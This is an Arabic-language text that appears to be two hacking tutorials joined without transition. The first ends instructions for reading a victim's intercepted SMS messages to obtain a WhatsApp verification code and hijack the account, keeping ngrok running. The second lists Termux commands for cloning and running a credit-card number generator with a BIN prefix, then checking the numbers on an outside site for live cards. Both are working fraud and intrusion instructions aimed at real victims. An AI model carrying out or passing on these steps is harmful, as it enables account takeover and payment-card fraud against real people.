←الان سوف يظهر لك ملف بصيغة txt بها كل الرسائل التي لدى الضحية اكتب exit وبعدها ls لإظهار الملفات ستجد الرسائل في ملف txt لإظهار الرسائل الي في الملف ↓

←اكتب امر cat ####.txt

←غير .####.txt الى اسم الملف الذي تريد ان تحصل على رسائل الضحية به عندما تفتح الملف ستجد رسالة بها رمز التحقق الخاص برقم هاتف الضحية
استخدمه لإختراق واتساب الضحية

ملاحظة يجب ان تبقى اداه ngrok تعمل حتى نهاية الاختراق

السَلٱمٌ عـَلـْيگمّ-ۈرحـْمّـٌة ٱللـّہ ﯙبُرگـّاتہ

👇 الًيَوُمًِ عندنا شرح 👇

⚜ شرح استخراج فيزات من تيرمكس 🔱


الاوامر:

1- pkg update

2- pkg upgrade

3- pkg install python

4- pkg install python2

5- pkg install git

6- git clone https://github.com/kuurtb/ccgen.git
7- ls

8- cd ccgen

9- ls

10- cd es_MX

11_  ./ccgen.py

12_ ./ccgen.py -b 548732xxxxxxxxxx -u 100 -d -c

وراح يبدا يستخرج 📡

وطبعا صعب كتير تجيب فيزات شغالة 💳

انَـَتَ لما تستخرج ويطلعلك فيزات 💎

انسخهم كلهم مع بعض 📈

https://xuls.to/ccn/

وحطهم بهاد الموقع ☝👆 وبفحصهم وضلك بنفس الصفحة حط ٱڅڑ امر وراح يطلعلولك غيرهم وانت افحصهم ومبرووووك الفيزات ✅ 👌